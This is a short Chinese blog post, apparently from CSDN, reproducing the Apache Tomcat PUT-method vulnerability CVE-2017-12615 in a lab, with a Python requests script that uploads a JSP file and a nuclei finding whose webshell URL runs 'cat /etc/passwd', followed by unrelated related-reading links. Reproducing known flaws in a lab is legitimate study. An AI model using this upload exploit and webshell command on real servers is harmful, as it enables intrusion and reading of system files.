-
CVE-2017-12615 PUT方法漏洞复现
这里的端口出现占用问题,需要修改端口
python进行POC验证
- import requests
- url='http://192.168.142.151:8080/1.jsp/'
- data='shell'
- header={
- 'Accept': '*/*',
- 'Accept-Language': 'en',
- 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
- 'Connection': 'close',
- 'Content-Type': 'application/x-www-form-urlencoded',
- 'Content-Length': '5'
- }
- requests.put(url,data=data,headers=header)
使用nuclei工具
找到[CVE-2017-12615] [http] [high] http://192.168.142.151/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
浏览器访问,获得/etc/passwd信息
-
相关阅读:
拼图小游戏
【CTF】bjdctf_2020_babystack2
Java8 CompletableFuture runAsync等使用学习总结 submit() execute()等
qt功能自己创作
CDN,DNS,ADN,SCDN,DCDN,ECDN,PCDN,融合CDN的介绍
Makefile 中一些常用语法讲解
4 条件判断和循环
CCRC认证是什么?
PCB厚铜板的设计,这一点一定要注意
机器学习-特征选择:如何使用互信息特征选择挑选出最佳特征?
- 原文地址:https://blog.csdn.net/weixin_56537388/article/details/132746664